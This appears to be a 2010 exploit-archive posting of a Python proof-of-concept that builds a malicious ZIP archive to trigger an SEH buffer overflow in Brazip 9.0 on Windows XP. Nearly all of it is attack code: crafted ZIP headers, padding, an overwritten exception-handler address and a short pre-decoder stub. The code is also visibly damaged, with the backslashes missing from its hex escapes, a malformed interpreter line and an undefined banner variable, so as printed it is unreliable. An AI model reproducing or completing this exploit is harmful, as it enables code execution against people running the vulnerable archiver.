brazip-overflow.txt
Posted on 18 August 2010
#!user/bin/python ###################################################################### # Brazip 9.0 (.zip File) BoF Poc (SEH) # Homepage : www.brazip.com.br # Version : 9.0 # Tested Os : Windows XP SP1/SP3 EN # Usage : $ Python Brazip-poc.py ###################################################################### #AUTHOR: ITSecTeam #Email: Bug@ITSecTeam.com #Website: http://www.itsecteam.com #Forum : http://forum.ITSecTeam.com #Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability60.htm #Thanks: Hoshang jafari aka [PLATEN] ###################################################################### import sys print __banner__ header_1 =("x50x4Bx03x04x14x00x00" "x00x00x00xB7xACxCEx34x00x00x00" "x00x00x00x00x00x00x00x00" "xe4x0f" "x00x00x00") header_2 = ("x50x4Bx01x02x14x00x14" "x00x00x00x00x00xB7xACxCEx34x00x00x00" "x00x00x00x00x00x00x00x00x00" "xe4x0f" "x00x00x00x00x00x00x01x00" "x24x00x00x00x00x00x00x00") header_3 = ("x50x4Bx05x06x00x00x00" "x00x01x00x01x00" "x12x10x00x00" "x02x10x00x00" "x00x00") nseh="x41x41x41x41" seh="x65x47x7ex6d" payload = "A" * 297 + nseh + seh predecoder = "x59x59x59x51x5c" payload=payload+predecoder filltoebx="B" * (100-len(predecoder)) rest = "C" * (4064-len(payload+filltoebx)) + ".txt" payload = payload+filltoebx+rest exploit = header_1 + payload + header_2 + payload + header_3 try: f=open("Brazip-poc.zip",'w') f.write(exploit) f.close() print "[+] File created successfully !" sys.exit(0) except: print "[-] Error cant write file to system "
